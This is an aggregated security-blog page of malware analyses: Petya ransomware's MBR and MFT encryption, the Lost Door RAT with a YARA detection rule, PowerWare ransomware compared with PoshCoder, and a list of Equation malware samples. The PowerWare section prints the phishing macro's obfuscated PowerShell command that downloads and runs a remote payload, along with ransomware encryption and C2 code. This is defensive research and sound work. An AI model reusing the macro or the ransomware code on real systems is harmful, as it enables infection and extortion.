Home   Blog   Twitter   Database  

Petya: the two-in-one trojan


Infecting the Master Boot Record (MBR) and encrypting files is nothing new in the world of malicious programs. Back in 1994, the virus OneHalf emerged that infected MBRs and encrypted the disk contents. However, that virus did not extort money. In 2011, MBR blocker Trojans began spreading (Trojan-Ransom.Win32.Mbro) that infected the MBR and prevented the operating system from loading further. The victim was prompted to pay a ransom to get rid of the problem. It was easy to treat a system infected by these blocker Trojans because, apart from the MBR, they usually didn’t encrypt any data on the disk.

Today, we have encountered a new threat that’s a blast from the past. The Petya Trojan (detected by Kaspersky Lab products as Trojan-Ransom.Win32.Petr) infects the MBR preventing normal system loading, and encrypts the Master File Table (MFT), an important part of the NT file system (NTFS), thus preventing normal access to files on the hard drive.

The infection scenario

The people spreading Petya attack their potential victims by sending spam messages containing links that download a ZIP archive. The archive contains the Trojan’s executable file and a JPEG image. The file names are in German (Bewerbungsunterlagen.PDF.exe, Bewerbungsmappe-gepackt.exe), are made to look like resumes for job candidates, and target HR staff in German-speaking countries.

Petya: the two-in-one trojan

Contents of the archives downloaded from links in spam

The cybercriminals didn’t bother with automatic escalation of privileges – the manifest of the Trojan’s executable file contains the following standard record:

Petya: the two-in-one trojan

If the user launches the malicious executable file Petya, Windows will show the standard UAC request for privilege escalation. If the system has been properly configured by the system administrators (i.e. UAC is enabled, and the user is not working from an administrator account), the Trojan won’t be able to run any further.

Unfortunately, a user who has the privileges to agree to a UAC request often underestimates the potential risks associated with launching unknown software with elevated rights.

How it works

The executable file and the packer

A Petya Trojan infection begins with the launch of the malicious executable file. The samples of the Trojan that Kaspersky Lab received for analysis are, just like most other malware samples, protected with a customized packer. When the executable file launches, the malicious packer’s code begins to work – it unpacks the malicious DLL Setup.dll into a newly designated RAM area, and then passes control to it.

Cybercriminals typically use packers to avoid detection – circumvent static signatures, trick the heuristic analyzer, etc. While investigating the Petya packer, we noticed an unusual trick used by the cybercriminals.

Cybercriminals often try to create the packer in such a way that a packed malicious executable file looks as similar as possible to a regular legitimate file. Sometimes, they take a legitimate file and substitute part of the code with malicious code. That’s what they did with Petya, with one interesting peculiarity: it was a part of the standard compiler-generated runtime DLL that was replaced with malicious code, while the function WinMain remained intact. The illustration below shows the transition, beginning from the entry point (“start”). As can be seen, the function of unpacking malicious code (which we dubbed “evil”) is called from the legal function __calloc_crt which is part of the runtime code.

Petya: the two-in-one trojan

Diagram of transitions between the malicious packer’s functions

Why do it that way? Obviously, the creators of the malicious packer were trying to trick an inattentive researcher or automatic analyzers: the file looks legitimate – WinMain doesn’t contain malicious code – so it’s possible that it will be overlooked. Besides, if the breakpoint is set at WinMain during debugging, then the malicious code works (and sends the system into BSOD, as we will discuss later in detail) and execution is over before the breakpoint is even reached.

Kaspersky Lab has detected Petya samples that masquerade as legitimate files written in C/C++ and in Delphi.

The malicious DLL

Setup.dll is a DLL with just one export: _ZuWQdweafdsg345312@0. It is written in C and compiled in Microsoft Visual Studio. The cybercriminals used an implementation of cryptographic algorithms available in the public library mbedtls (formerly polarssl). Setup.dll is not saved to the hard drive as a separate file, but always remains in the RAM.

When Setup.dll receives control, it decrypts the data contained in the section ‘.xxxx’ and then proceeds to infect the victim computer.

Petya: the two-in-one trojan

The encrypted ‘.xxxx’ section containing data

Petya: the two-in-one trojan

Fragment of the decrypted data from the ‘.xxxx’ section

At a higher degree of abstraction, the actions of Setup.dll come down to the following:

  1. Re-write the boot record on the hard drive with its own malicious loader;
  2. Generate a key, infection ID and other auxiliary information, and save them to the hard drive;
  3. Cause a system abort and reboot, thereby passing control to the malicious loader.

Now let’s look in detail at how all of this is implemented in the Trojan. But before doing so, we need to define the terminology used.

Hard disk sector – the minimum addressable unit of a hard drive, typically 512 bytes.

Master boot record (MBR) – the code and the data written to Sector 0. After hardware is initialized, this code is used to boot the PC. Also, this sector contains the hard disks’ partition table. A disk partitioned with MBR may have up to four primary partitions, and the maximum partition size is ~2.2 TB.

GUID Partition Table (GPT) – a more modern standard of hard drive layout. It supports up to 128 partitions, each up to 9.4 ZB in size (1 ZB = 1021 bytes.)

Now let’s return to the Trojan under review. Setup.dll can infect disks partitioned according to either the older MBR standard or the more modern GPT standard. There are two alternative branches of execution sequences in the malicious program; the choice of execution branch depends on the data in the field PartitionStyle of the structure PARTITION_INFORMATION_EX.

Petya: the two-in-one trojan

Selection of the execution branch for disk infection, depending on whether the disk has MBR or GPT partitioning

Infecting an MBR disk

When infecting an MBR disk, Setup.dll performs the following actions:

  1. Encrypts sector 0 (the original code and the MBR data) with the simple operation XOR 0x37 (ASCII ‘7’), writes the result to sector 56;
  2. Encrypts sectors 1-33 with the same operation XOR 0x37;
  3. Generates configuration data for the malicious loader, writes them to sector 54;
  4. Creates the verification sector 55 populated with the repeating byte 0x37;
  5. Copies the disk’s NT signature and the partition table saved from the original MBR into its own first-level loader; writes first-level malicious code to sector 0 of the disk, and writes second-level code to sectors 34-50 (referred to here as the malicious loader);
  6. Calls the function NtRaiseHardError, which causes the operating system to crash (BSOD – the ‘blue screen of death’).

When an MBR disk has been infected, the beginning of the disk has the following structure:

Number of sector Content
0 First-level malicious loader
1 – 33 Encrypted sectors 1-33 (XOR 0x37)
34 – 50 Second-level malicious code
54 Configuration sector of the malicious program
55 Verification sector (populated with byte 0x37)
56 Encrypted original MBR code (XOR 0x37)

Infecting a GPT disk

When infecting a GPT disk, Setup.dll performs more actions:

  1. Based on Primary GPT Header data, it receives the address of GPT header copy;
  2. Encrypts the GPT header copy with XOR 0x37;
  3. Performs all the actions that are performed when encrypting an MBR disk.

When a GPT disk has been infected, the beginning of the disk has the following structure:

Number of sector Content
0 First-level malicious loader
1 – 33 Encrypted sectors 1-33 (XOR 0x37)
34 – 50 Second-level malicious code
54 Configuration sector of the malicious program
55 Verification sector (populated with byte 0x37)
56 Encrypted original MBR code (XOR 0x37)
Backup LBA –
Backup LBA + 33
Encrypted copy of GPT Header (XOR 0x37)

Generation of configuration data

In the configuration sector (sector 54), the Trojan keeps the data it needs to encrypt MFT and decrypt it if the victim pays the ransom. Generation of the configuration data consists of the following steps:

  1. Setup.dll generates a random string that is 16 characters long [1-9, a-x, A-X]; we will call this string password;
  2. Generate a pair of keys: ec_session_priv (a private key, a random large integer number) + ec_session_pub (public key, a point on a standard elliptic curve secp192k1);
  3. Calculate the session secret: session_secret = ECDH (ec_session_priv, ec_master_pub); the cybercriminals’ public key ec_master_pub is contained in the Trojan’s body;
  4. Calculate the aes_key = SHA512(session_secret) – only the first 32 bytes of the hash sum are used;
  5. Encrypt the ‘password’ string by XORing it with the first 16 bytes of ec_session_pub: password_xor = ec_session_pub[0, 15] xor password;
  6. Encrypt the result using AES-256 with the key aes_key: password_aes_encr = AES_enc(password_xor);
  7. Create the array ec_session_data = [ec_session_pub, password_aes_encr];
  8. Calculate base58: ec_session_data_b58 = base58_enc(ec_session_data);
  9. Use the result to calculate SHA256: digest = sha256(ec_session_data_b58);
  10. Create array: ec_data = [check1, check2, ec_session_data_b58], where check1, check2 are bytes calculated by the formulas:
    a = digest[0] & 0xF;
    b = (digest[0] & 0xF) < 10;
    check1 = (digest[0] >> 4) + 0x57 + ((digest[0] >> 4) < 10 ? 0xD9 : 0);
    check2 = a + 0x57 + (b ? 0xD9 : 0);
  11. Based on the ‘password’, create a key for MFT encryption;
  12. Petya: the two-in-one trojan

    Pseudocode creating a key for MFT encryption

  13. Generate IV – 8 random bytes which will be used during MFT encryption;
  14. Generate infection ID and use it to create “personalized” URLs for ransom payment webpages.

Ultimately, the configuration data structure looks like this:

Petya: the two-in-one trojan

In C language syntax, this structure can be presented as follows:


This is what the configuration data looks like after it is written to the hard drive:

Petya: the two-in-one trojan

Note that if the user turns off their computer after this stage and doesn’t switch it on again, only minimum damage will be done, as it is not difficult to decrypt data encrypted with 1-byte XOR. Therefore, a good piece of advice: if you launch an unknown file and your system suddenly crashes, showing a blue screen, you should switch off your computer and get help from a qualified specialist. The specialist should be able to identify a Petya infection and restore the disk sectors encrypted with XOR.

If, however, the computer was re-booted, then the Trojan’s third stage kicks in – the malicious code written to sectors 0 and 34–50.

The malicious loader

After rebooting, the code in sector 0 (the first-level loader) gains control. It loads the main second-level malicious code from sectors 34–50 into the memory and passes control to it. This code, in turn, receives information about the hard drives available in the system, searches for the disk where the configuration is written, reads the configuration data from sector 54 and, depending on the value in the field ‘config.state’, begins encryption (if the value is 0) or asks the user to enter the decryption key that they have purchased (if the value is 1).

Petya: the two-in-one trojan

Fragment of code implementing the Trojan’s logic

Encryption of MFT

The master file table (MFT) is a data structure with information about every file and directory on a volume formatted into NTFS, the file system that is used in all modern versions of Windows. The table contains the service data required to find each file on the disk. It can be compared to a table of contents in a book that tells you on which page to find a chapter. Similarly, MFT indicates which logical cluster a file is located in.

It is namely this critical area that is attacked by Petya. If the value of ‘config.state’ is equal to 0 during launch, it does the following:

  1. Displays a fake disk check message:
  2. Petya: the two-in-one trojan

  3. Reads the key ‘config.salsa_key’ from the configuration sector into a local array; sets this field to zero on the disk, sets ‘config.state’ field at 1;
  4. Encrypts the verification sector 55 with the stream cipher Salsa20; this sector is populated beforehand with the byte 0x37 (see the section ‘Infecting an MBR disk’ above);
  5. Searches for each partition’s MFT on each connected hard drive;
  6. Encrypts the MFT data with cipher Salsa20. Encryption is performed in parts of 8 sectors (i.e. the size of each part is 4 KB). A counter of the encrypted parts is kept in sector 57 of the first disk.
  7. When encryption is over, it triggers a system reboot.

After the reboot, Petya displays an animated image of a flashing red and white skull drawn in ACCII-art style.

Petya: the two-in-one trojan

If the user presses any key, the Trojan displays a text which tells the victim in no uncertain terms what has happened.

Ransom demand and decryption

Petya: the two-in-one trojan

On this screen Petya displays links to the ransom payment webpages located in the Tor network (the addresses are specified in config.mal_urls), and the “personal decryption code” which the victim has to enter at either of the above sites. In reality, this “code” is the content of the field ‘config.ec_data’, hyphenated every six characters.

So, how do the cybercriminals plan to decrypt MFT, and are they even capable of doing so?

The ‘Key:’ field on this screen accepts a text string from the user. This string is checked for length (a 16-character long string is required), and then the Trojan uses it to calculate a 32-byte ‘salsa_key’ (following the algorithm discussed above in the section ‘Generation of configuration data’). The Trojan then attempts to decrypt the verification sector 55 with this key, and checks that the decrypted sector is completely populated with the byte 0x37. If it is, the key is considered correct, and Petya uses it to decrypt MFT. Then it decrypts all starting sectors encrypted with XOR 0x37, decrypts the original MBR and prompts the user to reboot the computer.

Thus, the correct string to be entered in the ‘Key:’ field is that very same ‘password‘ string that is generated in the first step when the configuration data is created.

Petya: the two-in-one trojan

Screen message displayed after successful decryption

The question remains: how do the cybercriminals know this string so they can communicate it to a victim who has paid the ransom? No automatic communication with C&C servers is established during the entire infection life cycle. The answer lies in the description of the algorithm for generating configuration data.

The victim is prompted to manually enter their “personal decryption code” ec_data on the ransom payment webpage. The cybercriminal can then perform the following actions:

  1. Decode base58: base58_dec(ec_session_data_b58) = ec_session_data = [ec_session_pub, password_aes_encr]
  2. Calculate session_secret = ECDH(ec_session_pub, ec_master_priv), in accordance with the Elliptic curve Diffie–Hellman properties, where ec_master_priv is a private key known to the Trojan’s creators only;
  3. Calculate aes_key = SHA256(session_secret);
  4. Decrypt AES-256: password_xor = AES_dec(password_encr);
  5. Knowing ec_session_pub, calculate the original password based on password_xor.

The ransom payment webpage

When we visit the Tor site at the URL provided by the Trojan, we see a page that requires a CAPTCHA to be entered, after which the main ransom payment page is loaded. The design of the page immediately catches the eye, with its hammer and sickle and the word ‘ransomware’ in pseudo-Cyrillic. It looks like a USSR parody along the lines of the game Red Alert.

Petya: the two-in-one trojan

This page displays a countdown clock showing when the ransom price will be doubled, as well as regularly updated links to news and publications related to Petya.

When the ‘Start the decryption process’ button is pressed, you end up on a page that asks you to enter the value of ‘ec_data’, which is now called “your identifier” rather than “your personal decryption code”. It looks like the cybercriminals still haven’t decided what to call this part.

Petya: the two-in-one trojan

When the user enters this string, the site displays the amount of ransom in BTC, information on how to purchase bitcoins, and the address where the money should be sent.

As well as that, there are two other pages on the website: FAQ and Support.

Petya: the two-in-one trojan

The FAQ page

The FAQ page is interesting in that it contains false information: in reality, RSA is not used by the Trojan in any way, at any stage of infection.

Petya: the two-in-one trojan

The Support page

On the Support page, the user is given the option of sending a message to the cybercriminals. One phrase in particular stands out: “Please write your message in english, our russian speaking staff is not always available”. This implies that there is at least one person in the group who speaks Russian.

Geographic distribution

As we noted above, the spam messages target German-speaking victims. KSN statistics clearly show that Germany is the main target for the cybercriminals.

Petya: the two-in-one trojan

TOP 5 countries attacked by Petya Trojan by the number of attacked users:

Country Number of attacked users
1 Germany 579
2 China 19
3 India 8
4 Japan 5
5 Russian Federation 5


After analyzing the Petya Trojan, we discovered that it is an unusual hybrid of an MBR blocker and data encryptor: it prevents not only the operating system from booting but also blocks normal access to files located on the hard drives of the attacked system.

Although Petya is noticeably different from the majority of ransomware that has emerged in the recent years, it can hardly be described as a fundamentally new development. The ideas behind the Trojan have been seen before in earlier malware; the creators of Petya have simply combined them all in a single creation. That said, it should be acknowledged that it requires a certain degree of technical skill to implement a low-level code to encrypt and decrypt data prior to OS booting.

Another interesting peculiarity about Petya is the pseudo-Soviet graphic design on the ransom payment website; the name of the Trojan also fits into the image of a “Russian Trojan” designed by cybercriminals. There is no certainty as to whether the Trojan’s creators originally come from Russia or other former Soviet states; however, the text on the payment page suggests there is at least one Russian speaker in the gang.

Kaspersky Lab’s products protect users from this threat: Petya’s executable files are detected with the verdict Trojan-Ransom.Win32.Petr; in addition, the behavior analyzer proactively detects even unknown versions of this Trojan with the verdict PDM:Trojan.Win32.Generic.

P.S. How to decrypt your data without paying the ransom

On April 8, some independent researchers reported that they had found a method of restoring the password without paying the ransom to the cybercriminals. The method is based on a genetic algorithm; with the 8-byte long IV (stored in configuration sector 54) and the content of the encrypted verification sector 55, you can calculate the value of the password that generates the salsa key, which can then be used to decrypt the MFT.

Posted: 4 May 2016 | 3:39 am

Prisoner takes selfies in police van, posts them to Facebook

"I think there might have been a cell phone involved … Let's just say I found it," Shane Holbrook said of the contraband maybe-phone.

Posted: 4 May 2016 | 2:56 am

Server-jacking exploits for ImageMagick are so trivial, you'll scream

All the more reason to deploy mitigations and patches

Code dive  Samples of booby-trapped image files that exploit ImageMagick to compromise servers and other computers are well and truly out in the open now.…

Posted: 4 May 2016 | 1:21 am

Lost Door RAT: Accessible, Customizable Attack Tool

By Janus Agcaoili 

We recently came across a cyber attack that used a remote access Trojan (RAT) called Lost Door, a tool currently offered on social media sites. What also struck us the most about this RAT (detected as BKDR_LODORAT.A) is how it abuses the Port Forward feature in routers. Using this feature enables remote systems to connect to a specific computer or service within a private local-area network (LAN). However, when used maliciously, this feature allows remote attackers to mask their activities in the network and avoid immediate detection. Because this RAT is easy to customize, even knowledge of the indicators of compromise (which may change as a result) may not be sufficient in thwarting the threat. Easily customizable RATs like Lost Door can be hard to detect and protect against, posing a challenge to IT administrators.

Unlike most attack tools that one can only find in cybercriminal underground markets, Lost Door is very easy to obtain. It’s promoted on social media sites like YouTube and Facebook. Its maker, “OussamiO,” even has his own Facebook page where details on his creation can be found. He also has a dedicated blog (hxxp://lost-door[.]blogspot[.]com/) where tutorial videos and instructions on using the RAT is found. Any cybercriminal or threat actor can purchase and use the RAT to launch attacks.


Figure 1. Facebook page advertising Lost Door RAT


Figure 2. Blog promoting Lost Door RAT

Besides selling the tool’s source code, OussamiO also offers customers the option to download a compiled sample free of charge. This could be a way to entice users of the said free sample to buy the full version of the RAT for their own attack needs.

We can say that Lost Door RAT’s creator is brazen, in that he relies on the Surface Web to advertise his tool. He does not exert effort to hide his tracks by going into the Deep Web. This is not to say that this tool is not available in the underground, though. While conducting research, we spotted Lost Door builders in different underground markets, such as those in Russia, China, and Brazil since 2009.


Figure 3. Lost Door RAT v8 builder


Figure 4. Lost Door RAT v8 offering in the Brazilian underground market

Easily customizable

Since Lost Door’s emergence in 2007, its creator has released various versions, the latest being Lost®Door E-Lite v9. Like other notorious RATs such as PlugX and Poison Ivy, Lost Door is easy to customize to include new and varying routines. One can choose from a wide array of predefined server builds and other options for propagation, anti-analysis, stealth, and persistence, among others. Cybercriminals can also include worm capabilities, backdoor commands, and even keylogging routines to customize their RATs; both the Facebook and Blogspot pages where the RAT is offered have step-by-step instructions to guide attackers or even newbie cybercriminals in customizing their versions.


Figure 5. Lost Door E-Lite v9 builder

As mentioned earlier, Lost Door leverages the routers’ Port Forward feature, a tactic also used by DarkComet. By abusing this feature, a remote attacker can gain access to the server side of a private network whether at home or in an office. This also means that any malicious traffic or communication can be passed off as normal/internal, thereby helping attackers mask their C&C address, since the server side does not directly connect to it. Instead, they only need the target router’s IP address and access to its open ports (after configuring it to port forward network traffic). Using Port Forward feature also evades network monitoring, as it only connects to an internal/router IP address. Our analysis also shows that this RAT connects to an internal IP address, 192[.]168[.]1[.]101 via port 9481. Both IP address and port can be customized through the builder as well.

Other features of the latest Lost Door include printing of files via the remote printer, executing apps, and gathering information from the Clipboard memory. This RAT also supports different languages: English, Arabic, French, Spanish, Polish, Italian, and Swedish.  In the Blogspot page, OussamiO mentions that if anyone wishes to add another language, they can translate the English version and share the link to the Facebook fan page of Lost Door.


Because this threat is customizable, IT administrators may find it hard to detect this on their network due to the changing indicators of compromise (IoC). We listed down  the following unique strings we gathered that can serve as starting point in detecting Lost Door RAT:

In addition, the following is the YARA rule for this threat.

rule lodorat_code
author = “Trend Micro, Inc.”
description = “system infected with lodorat”
in_the_wild = true

$s1 = “OussamiO” wide ascii
$s2 = “Welcome To Lost Door” wide ascii nocase
$s3 = “E-Lite v9” wide ascii nocase
$s4 = “We Control Your Digital Worlds”

$a1 = /shutdown.{0,5}(-s|-r).{0,5}[0-9]*/i
$a2 = /(D:|E:|F:)\\Music.exe/i
$a3 = “C:\\Program Files\\LimeWire”
$a4 = “C:\\Program Files\\eMule”
$a5 = “C:\\Program Files\\Morpheus”
$a6 = “C:\\Program Files\\Bearshare”
$a7 = “C:\\Program Files\\Kazaa”
$a8 = “C:\\Program Files\\Ares”

$r1 = /CurrentVersion\\Policies\\System\\(DisableTaskMgr|DisableRegistryTools)/i

any of ($s*) and (2 of ($a*) or $r1) or
2 of ($s*)

Early detection of Lost Door RAT can prevent dire consequences like information theft and further infection in the enterprise network. We protect our users and their systems from the dangers this threat may pose via Trend Micro™ Deep Discovery. Its Sandbox with Script Analyzer can detect and analyze Lost Door RAT.  Our endpoint products such as Trend Micro™ SecuritySmart Protection Suites, and Worry-Free Business Security can detect this RAT as well.

With additional analysis from Joey Costoya, Lion Gu, Rhena Inocencio, and Fernando Merces

Post from: Trendlabs Security Intelligence Blog - by Trend Micro

Lost Door RAT: Accessible, Customizable Attack Tool

Posted: 3 May 2016 | 12:00 pm

PowerWare or PoshCoder? Comparison and Decryption

PowerWare was brought to my attention by Carbon Black via their blog post. PowerWare is downloaded by a malicious macro-enabled Microsoft Word document that is distributed via a phishing email campaign. The malicious document in question attempts to convince the user to enable macros by informing them that the file is protected by Microsoft Office. This, of course, is a farce. Once the macro is enabled, the PowerWare payload will be downloaded and executed. PowerWare, unfortunately, is hitting healthcare providers.

Figure 1: Screenshot of the macro-enabled malicious Microsoft Word document tricking the user into enabling macros

Using olevba.py from oletools, we can extract the macro from the aforementioned document for analysis.

Private Sub Document_Open() Dim CGJKIYRSDGHJHGFFG As String CGJKIYRSDGHJHGFFG = "cmd /K " + "pow" + "eR" & "sh" + "ell.e" + "x" + "e -WindowStyle hiddeN -ExecuTionPolicy BypasS -noprofile (New-Object System.Net.WebClient).DownloadFile('http://skycpa[.]in/file.php','%TEMP%\Y.ps1'); poWerShEll.exe -WindowStyle hiddeN -ExecutionPolicy Bypass -noprofile -file %TEMP%\Y.ps1" Shell CGJKIYRSDGHJHGFFG, 0 MsgBox ("Unreferenced library required") End Sub

From the output above, we can see when enabled, the macro intends to run this PowerShell command:

"cmd /K " + "pow" + "eR" & "sh" + "ell.e" + "x" + "e -WindowStyle hiddeN -ExecuTionPolicy BypasS -noprofile (New-Object System.Net.WebClient).DownloadFile('http://skycpa.in/file[.]php','%TEMP%\Y.ps1'); poWerShEll.exe -WindowStyle hiddeN -ExecutionPolicy Bypass -noprofile -file %TEMP%\Y.ps1”

It employs use of “cmd” to launch “Powershell.exe,” because on some systems, calling the executable directly is blocked. The command also includes some minor obfuscation, such as splitting PowerShell.exe into bit sized chunks and mixing upper and lower case. In addition, the command attempts to bypass the Execution Policy and not use any profiles the system may have set to be used by default. It then downloads the payload form syscpa[.]in to a temporary directory as Y.ps1 and then executes it.

PowerWare based on PoshCoder

Upon examination of the PowerShell file that was downloaded, you may notice that the programming logic looks familiar. PowerWare seems to be heavily based on PoshCoder, the ransomware that rose to infamy due to the fact it destroyed encrypted data using a logic based programming flaw. The programming style and flow is similar enough that some may even argue that it's a variant of PoshCoder and not a totally new PowerShell ransomware family. The following are some of their major similarities:

1. Both incorporate the use of the RijndaelManaged class. The use of that class itself is not uncommon. However, if you examine the usage of the class, you will notice that the two are quite similar from the key initialization to the padding and mode choice. The exception is their Initialization vector (IV).

Excerpt from PoshCoder Sample

$XlowQsiRsKORgfR = new-Object System.Security.Cryptography.RijndaelManaged $XlowQsiRsKORgfR.Key = (new-Object Security.Cryptography.Rfc2898DeriveBytes $BchjdRgasjcThsjd, $UxjcRgasjfvRsj, 5).GetBytes(32) $XlowQsiRsKORgfR.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash([Text.Encoding]::UTF8.GetBytes("XlowQsiRsKORgfRjBMPLmCamEMyFRlWfsgTgh") )[0..15] $XlowQsiRsKORgfR.Padding="Zeros" $XlowQsiRsKORgfR.Mode="CBC"

Excerpt from PowerWare

Bnx8Khahs3Hjx96 = new-Object System.Security.Cryptography.RijndaelManaged $Bnx8Khahs3Hjx96.Key = (new-Object Security.Cryptography.Rfc2898DeriveBytes $GBCSWHJKIYRDVHH, $VGHKJJGFERHJJGSDQWD, 5).GetBytes(32) $Bnx8Khahs3Hjx96.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash([Text.Encoding]::UTF8.GetBytes("alle") )[0..15] $Bnx8Khahs3Hjx96.Padding="Zeros" $Bnx8Khahs3Hjx96.Mode="CBC"

2. If you count the number file types that they encrypt, not shown for space reasons, you get 451 file types. Of these 451, most are found in both samples with the exception of five types, "*.amf", "*.qtiq", "*.srf", "*.val" and "*.waw". That works out to be slightly less than 1% difference in their two lists.

That being said the two samples are not exact copies of each other, there are some differences in their codebases as you will see below:

Excerpt from PowerWare

$GBCSWHJKIYRDVHH = ([ChaR[]](GeT-RandOm -Input $(48..57 + 65..90 + 97..122) -Count 50)) -join "" $SGKPOTTHJMNFDRYJKJ = ([ChaR[]](GeT-RandOm -Input $(48..57 + 65..90 + 97..122) -Count 20)) -join "" $SQEGJJYRFBNHFFHJ = ([ChaR[]](GeT-RandOm -Input $(48..57 + 65..90 + 97..122) -Count 25)) -join ""

$73848HhjhdRghx67Hhsh = New-Object -ComObject MsXml2.XMLHTTP $73848HhjhdRghx67Hhsh.open('POST', $XCJHEDIJGDFJMVD, $false) $73848HhjhdRghx67Hhsh.setRequestHeader("C"+"ontent-tYpe", "apPlicAtion/x-www-form-url"+"enCodeD") $73848HhjhdRghx67Hhsh.setRequestHeader("ConteNt-length", $post.length) $73848HhjhdRghx67Hhsh.setRequestHeader("CoNNeCtion", "close") $73848HhjhdRghx67Hhsh.send($HGJHBVSRYUJNBGDRHJ)

3. PoshCoder variants featured some bad programming that made some files unrecoverable. Specifically, the script indicates that any file less than 42871 bytes in size will be encrypted completely but the larger files will only have the first 42871 bytes encrypted. That was an issue because the encryption will read in the first 42871 bytes from the file, encrypt them and then add 16 bytes of padding to reach the next boundary. Due to the padding, the overwritten bytes from 42872 to 42880 cannot be recovered. There was also the issue of the AES key not being properly padded when it was converted into a base64 string, so when decoded the variable would contain NULL or an empty value. Luckily, PowerWare doesn’t seem to have the these issues, and the files are recoverable.

Decrypting PowerWare

As mentioned earlier, PowerWare transmits randomly generated values to a remote server in clear-text via a POST request using XMLHTTP. This makes the traffic easily decipherable by AlienVault USM, or another NIDS with a proper Suricata rule such as the one below:

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"AV TROJAN Ransomware PowerWare/Poshcoder CnC Checkin"; flow:established,to_server; content:"POST"; http_method; content:"Content-Type|3a| application/x-www-form-urlencoded"; http_header; nocase; content:".php"; http_uri; content:"string="; http_client_body; nocase; content:"&string2="; http_client_body; nocase; content:"&uuid="; http_client_body; nocase; reference:md5,4564d49eda7a048f301b1f87f9da3c62; classtype:trojan-activity; sid:12345678; rev:1;)

Which would, in theory, capture the traffic below:

To decrypt the files we need two things:

  1. The password used during encryption (string)
  2. The salt used during the encryption process (string2).

Using the values above for "string" and "string2" we can decrypt the files encrypted by PowerWare.

param([string]$filename = $(Throw "Argument 'filename' required."), [string]$string1 = $(Throw "Please enter 'string'."),[string]$string2 = $(Throw "Please enter 'string2'.")) write-host "The entered filename is: $filename" write-host "The entered Password is: $string1" write-host "The entered Salt is: $string2" $salt = [Text.Encoding]::UTF8.GetBytes($string2) $Rijndael = new-Object System.Security.Cryptography.RijndaelManaged $Rijndael.Key = (new-Object Security.Cryptography.Rfc2898DeriveBytes $string1, $salt, 5).GetBytes(32) $Rijndael.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash([Text.Encoding]::UTF8.GetBytes("alle") )[0..15] $Rijndael.Padding="Zeros" $Rijndael.Mode="CBC" try{   $binReader = New-Object System.IO.BinaryReader([System.IO.File]::Open($filename, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)   if ($binReader.BaseStream.Length -lt 2048){     $binReader_length = $binReader.BaseStream.Length   }   else   {     $binReader_length = 2048   }   $data = $binReader.ReadBytes($binReader_length)   $binReader.Close()   $The_Decryptor = $Rijndael.CreateDecryptor()   $memStream = new-Object IO.MemoryStream   $cryptoStream = new-Object Security.Cryptography.CryptoStream $memStream,$The_Decryptor,"Write"   $cryptoStream.Write($data, 0,$data.Length)   $cryptoStream.Close()   $memStream.Close()   $The_Decryptor.Clear()   $memStream_Array = $memStream.ToArray()   $binWriter = New-Object System.IO.BinaryWriter([System.IO.File]::Open($filename, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)   $binWriter.Write($memStream_Array,0,$memStream_Array.Length)   $binWriter.Close() } catch {     write-host "Someting broke, set debuggers to level 10" }

Samples Analyzed:


PowerWare, while it appears to be new, is heavily based on PoshCoder. More research is required, but this finding will hopefully assist security researchers in their efforts.


Posted: 4 Apr 2016 | 6:00 am

Equation samples - from the Kaspersky Report and additional

Here are a few samples from the report by Kaspersky Lab "Equation: The Death Star of Malware Galaxy" and additional samples of the same family. The full list is below

Download all the samples listed below. Email me if you need the password (New link)

List of files

Files from the report:
File NameMD5Size
_SD_IP_CF.dll_03718676311DE33DD0B8F4F18CFFD48803718676311de33dd0b8f4f18cffd488368 KB
Disk from Houston_6FE6C03B938580EBF9B82F3B9CD4C4AA6fe6c03b938580ebf9b82f3b9cd4c4aa61 KB
DoubleFantasy_2A12630FF976BA0994143CA93FECD17F2a12630ff976ba0994143ca93fecd17f216 KB
EquationDrug_4556CE5EB007AF1DE5BD3B457F0B216D4556ce5eb007af1de5bd3b457f0b216d372 KB
EquationLaser_752AF597E6D9FD70396ACCC0B9013DBE752af597e6d9fd70396accc0b9013dbe130 KB
Fanny_0A209AC0DE4AC033F31D6BA9191A8F7A0a209ac0de4ac033f31d6ba9191a8f7a180 KB
GrayFish_9B1CA66AAB784DC5F1DFE635D8F8A9049b1ca66aab784dc5f1dfe635d8f8a904560 KB
GROK_24A6EC8EBF9C0867ED1C097F4A653B8D24a6ec8ebf9c0867ed1c097f4a653b8d160 KB
nls_933w.dll_11FB08B9126CDB4668B3F5135CF7A6C511fb08b9126cdb4668b3f5135cf7a6c5208 KB
TripleFantasy_9180D5AFFE1E5DF0717D7385E7F543869180d5affe1e5df0717d7385e7f5438618 KB
TripleFantasy_BA39212C5B58B97BFC9F5BC431170827ba39212c5b58b97bfc9f5bc431170827199 KB

Additional Files:

File NameMD5Size
TripleFantasy_2DB76E2FCA15582D3984ACFC9F1243A92db76e2fca15582d3984acfc9f1243a918 KB
TripleFantasy_3AF3DA4F6FC1A59FC7842D9BB1B0A2AE3af3da4f6fc1a59fc7842d9bb1b0a2ae18 KB
TripleFantasy_89A388862905AD98F6C907ABEEA967C489a388862905ad98f6c907abeea967c418 KB
TripleFantasy_416EE796925AC5B2533760FA880B9FFC416ee796925ac5b2533760fa880b9ffc18 KB
TripleFantasy_3380BEF418E25E745795F698D7226EC03380bef418e25e745795f698d7226ec018 KB
TripleFantasy_9180D5AFFE1E5DF0717D7385E7F543869180d5affe1e5df0717d7385e7f5438618 KB
TripleFantasy_F17E0438DFF0D7A16365700A3B70D551f17e0438dff0d7a16365700a3b70d55118 KB
FannyWorm_002F5E401F705FE91F44263E49D6C216002f5e401f705fe91f44263e49d6c216180 KB
FannyWorm_00F5F27098D25A1961DF56A1C58398E200f5f27098d25a1961df56a1c58398e2180 KB
FannyWorm_00FAE15224F3A3C46D20F2667FB1ED8900fae15224f3a3c46d20f2667fb1ed89180 KB
FannyWorm_02D5EB43F5FC03F7ABC89C57B82C75F802d5eb43f5fc03f7abc89c57b82c75f8180 KB
FannyWorm_0A78F4F0C5FC09C08DC1B54D7412BC580a78f4f0c5fc09c08dc1b54d7412bc58180 KB
FannyWorm_0A209AC0DE4AC033F31D6BA9191A8F7A0a209ac0de4ac033f31d6ba9191a8f7a180 KB
FannyWorm_0A704348BD37EA5CCD2E0A540EB010C20a704348bd37ea5ccd2e0a540eb010c2180 KB
